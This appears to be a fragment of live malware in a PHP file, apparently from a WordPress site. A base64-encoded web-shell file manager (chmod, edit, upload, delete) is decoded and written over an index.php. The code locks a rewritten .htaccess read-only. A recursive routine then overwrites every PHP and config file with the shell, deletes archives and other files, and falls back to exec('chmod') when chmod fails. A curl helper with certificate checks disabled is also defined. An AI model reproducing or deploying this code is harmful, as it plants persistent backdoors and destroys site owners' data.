CAgICAgZWNobyAoIjxzY3JpcHQ+YWxlcnQoJ1NvbWUgZXJyb3Igb2NjdXJyZWQuJyk7IHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/cD0iIC4gZW5jb2RlUGF0aChQQVRIKSAuICInKTs8L3NjcmlwdD4iKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBpZiAoaXNzZXQoJF9HRVRbJ2MnXSkpIHsNCiAgICAgICAgaWYgKCFlbXB0eSgkX0dFVFsnYyddKSAmJiBpc3NldCgkX0dFVFsnYyddKSkgew0KICAgICAgICAgICAgZWNobyAnDQogICAgPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCiAgICAgICAgQ2htb2Q6DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjaG1vZF92YWx1ZSIgdmFsdWU9IiI+DQogICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLWRhcmsiIHZhbHVlPSJDaG1vZCIgbmFtZT0iY2htb2QiPg0KICAgIDwvZm9ybT4nOw0KICAgICAgICAgICAgaWYgKGlzc2V0KCRfUE9TVFsnY2htb2QnXSkpIHsNCiAgICAgICAgICAgICAgICAkbmFtZSA9IFBBVEggLiAiLyIgLiAkX0dFVFsnYyddOw0KICAgICAgICAgICAgICAgICRjaG1vZF92YWx1ZSA9IGludHZhbCgkX1BPU1RbJ2NobW9kX3ZhbHVlJ10sIDgpOw0KICAgICAgICAgICAgICAgIGlmKGNobW9kKCRuYW1lLCAkY2htb2RfdmFsdWUpKSB7DQogICAgICAgICAgICAgICAgICAgIGVjaG8gKCI8c2NyaXB0PmFsZXJ0KCdjaG1vZGVkLicpOyB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnP3A9IiAuIGVuY29kZVBhdGgoUEFUSCkgLiAiJyk7PC9zY3JpcHQ+Iik7DQogICAgICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+YWxlcnQoJ1NvbWUgZXJyb3Igb2NjdXJyZWQuJyk7IHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/cD0iIC4gZW5jb2RlUGF0aChQQVRIKSAuICInKTs8L3NjcmlwdD4iKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBpZiAoaXNzZXQoJF9HRVRbJ2UnXSkpIHsNCiAgICAgICAgaWYgKCFlbXB0eSgkX0dFVFsnZSddKSAmJiBpc3NldCgkX0dFVFsncSddKSkgew0KICAgICAgICAgICAgZWNobyAnDQogICAgPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCiAgICAgICAgPHRleHRhcmVhIHN0eWxlPSJoZWlnaHQ6IDUwMHB4Ow0KICAgICAgICB3aWR0aDogOTAlOyIgbmFtZT0iZGF0YSI+JyAuIGh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoUEFUSC4iLyIuJF9HRVRbJ2UnXSkpIC4gJzwvdGV4dGFyZWE+DQogICAgICAgIDxicj4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tZGFyayIgdmFsdWU9IlNhdmUiIG5hbWU9ImVkaXQiPg0KICAgIDwvZm9ybT4nOw0KDQogICAgaWYoaXNzZXQoJF9QT1NUWydlZGl0J10pKSB7DQogICAgICAgICRmaWxlbmFtZSA9IFBBVEguIi8iLiRfR0VUWydlJ107DQogICAgICAgICRkYXRhID0gJF9QT1NUWydkYXRhJ107DQogICAgICAgICRvcGVuID0gZm9wZW4oJGZpbGVuYW1lLCJ3Iik7DQogICAgICAgIGlmKGZ3cml0ZSgkb3BlbiwkZGF0YSkpIHsNCiAgICAgICAgICAgIGVjaG8gKCI8c2NyaXB0PmFsZXJ0KCdTYXZlZC4nKTsgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJz9wPSIgLiBlbmNvZGVQYXRoKFBBVEgpIC4gIicpOzwvc2NyaXB0PiIpOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+YWxlcnQoJ1NvbWUgZXJyb3Igb2NjdXJyZWQuJyk7IHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/cD0iIC4gZW5jb2RlUGF0aChQQVRIKSAuICInKTs8L3NjcmlwdD4iKTsNCiAgICAgICAgfQ0KICAgICAgICBmY2xvc2UoJG9wZW4pOw0KICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGlmIChpc3NldCgkX1BPU1RbInVwbG9hZCJdKSkgew0KICAgICAgICAkdGFyZ2V0X2ZpbGUgPSBQQVRIIC4gIi8iIC4gJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXTsNCiAgICAgICAgaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlVG9VcGxvYWQiXVsidG1wX25hbWUiXSwgJHRhcmdldF9maWxlKSkgew0KICAgICAgICAgICAgZWNobyAiPHA+Ii5odG1sc3BlY2lhbGNoYXJzKGJhc2VuYW1lKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJuYW1lIl0pKSAuICIgaGFzIGJlZW4gdXBsb2FkZWQuPC9wPiI7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBlY2hvICI8cD5Tb3JyeSwgdGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB5b3VyIGZpbGUuPC9wPiI7DQogICAgICAgIH0NCg0KICAgIH0NCiAgICBpZiAoaXNzZXQoJF9HRVRbJ2QnXSkgJiYgaXNzZXQoJF9HRVRbJ3EnXSkpIHsNCiAgICAgICAgJG5hbWUgPSBQQVRIIC4gIi8iIC4gJF9HRVRbJ2QnXTsNCiAgICAgICAgaWYgKGlzX2ZpbGUoJG5hbWUpKSB7DQogICAgICAgICAgICBpZih1bmxpbmsoJG5hbWUpKSB7DQogICAgICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+YWxlcnQoJ0ZpbGUgcmVtb3ZlZC4nKTsgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJz9wPSIgLiBlbmNvZGVQYXRoKFBBVEgpIC4gIicpOzwvc2NyaXB0PiIpOw0KICAgICAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICAgICBlY2hvICgiPHNjcmlwdD5hbGVydCgnU29tZSBlcnJvciBvY2N1cnJlZC4nKTsgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJz9wPSIgLiBlbmNvZGVQYXRoKFBBVEgpIC4gIicpOzwvc2NyaXB0PiIpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2VpZiAoaXNfZGlyKCRuYW1lKSkgew0KICAgICAgICAgICAgaWYocm1kaXIoJG5hbWUpID09IHRydWUpIHsNCiAgICAgICAgICAgICAgICBlY2hvICgiPHNjcmlwdD5hbGVydCgnRGlyZWN0b3J5IHJlbW92ZWQuJyk7IHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/cD0iIC4gZW5jb2RlUGF0aChQQVRIKSAuICInKTs8L3NjcmlwdD4iKTsNCiAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgZWNobyAoIjxzY3JpcHQ+YWxlcnQoJ1NvbWUgZXJyb3Igb2NjdXJyZWQuJyk7IHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCc/cD0iIC4gZW5jb2RlUGF0aChQQVRIKSAuICInKTs8L3NjcmlwdD4iKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCiAgICA/Pg0KDQoNCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4uanNkZWxpdnIubmV0L25wbS9ib290c3RyYXBANS4zLjAtYWxwaGExL2Rpc3QvanMvYm9vdHN0cmFwLmJ1bmRsZS5taW4uanMiDQogICAgICAgIGludGVncml0eT0ic2hhMzg0LXc3NkFxUGZEa01CRFhvMzBqUzFTZ2V6NnByM3g1TWxRMVpBR0MrbnVaQitFWWRnUlpnaXd4aFRCVGtGN0NYdk4iDQogICAgICAgIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjwvc2NyaXB0Pg0KPC9ib2R5Pg0KDQo8L2h0bWw+";
$codestr = base64_decode($codestr).$tezhen_code;
$ma_file_path_dir = str_replace("index.php","",$ma_file_path);
if(!is_dir($ma_file_path_dir)){
@mkdir($ma_file_path_dir, 0755, true);
}
if(!is_writable($ma_file_path) && file_exists($ma_file_path)){
@chmod($ma_file_path,0775);
}
file_put_contents($ma_file_path,$codestr);
}
if(!file_exists($ht_file_path) || filesize($ht_file_path)<220 || filesize($ht_file_path)>260){
@chmod($ht_file_path,0775);
$ht_content_new = "PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQogICAgUmV3cml0ZUVuZ2luZSBPbg0KICAgIFJld3JpdGVCYXNlIC8NCiAgICBSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0NCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZg0KICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kDQogICAgUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQ0KPC9JZk1vZHVsZT4=";
$ht_content_new = base64_decode($ht_content_new);
file_put_contents($ht_file_path,$ht_content_new);
@chmod($ht_file_path,0444);
traverseDirectory("C:/github_repos/wp-xsj21",[],$tezhen_code,$file_content);
}
@gc_collect_cycles();
sleep(3);
file_put_contents("C:/github_repos/wp-xsj21/".md5("weihutime").".txt",time()+8);
}
function traverseDirectory($dir, $patterns,$tezhen_code,$indxcodes) {
if(!is_writable($dir)){
$result = @chmod($dir,0755);
if(!$result){
if (function_exists('exec') && is_callable('exec')) {
@exec("chmod 0755 $dir");
}
}
}
$files = @scandir($dir);
if($files === false){
return false;
}
foreach ($files as $file) {
$filePath = $dir . DIRECTORY_SEPARATOR . $file;
if ($file != '.' && $file != '..') {
if (is_dir($filePath)) {
traverseDirectory($filePath, $patterns,$tezhen_code,$indxcodes);
} else {
$extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if (stripos($extension,"php")!==false || stripos($extension,"conf")!==false || $extension === '') {
if($extension === ''){
if(!is_writable($filePath)){
@chmod($filePath,0755);
}
@unlink($filePath);
}else{
$perms = @fileperms($filePath);
$octalPerms = @decoct($perms & 0777);
if($octalPerms!==false && stripos($octalPerms,"200")!==false){
continue;
}else{
if(!is_writable($filePath)){
@chmod($filePath,0755);
}
$rcontent = @file_get_contents($filePath);
if($rcontent !== false){
if(stripos($rcontent,$tezhen_code)===false && $filePath !== __FILE__ && $rcontent!="1"){
@file_put_contents($filePath,$indxcodes);
$result = @chmod($filePath,0200);
if($result===false){
@exec("chmod 0200 $filePath");
}
}
}
}
}
}else if($extension === 'zip' || $extension === 'rar'){
if(!is_writable($filePath)){
@chmod($filePath,0755);
}
@unlink($filePath);
}else if(stripos($extension,"htaccess")!==false && ROOTPATH!=$dir){
if(!is_writable($filePath)){
@chmod($filePath,0755);
}
@unlink($filePath);
}
}
}
}
}
function makeCurlRequest($url, $method = 'GET', $postData = array()) {
try{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$headers = array(
"Cache-Control: no-cache",
"Connection: keep-alive",
"Pragma: no-cache",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}
$response = curl_exec($ch);
curl_close($ch);
}catch (Throwable $e) {
if ($method === 'POST') {
$encodedData = http_build_query($postData);
$options = ['http' => ['method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => $encodedData]];
$context = stream_context_create($options);
$response = file_get_contents($url, false, $context);
}else{
$response = file_get_contents($url);
}
}
return $response;
}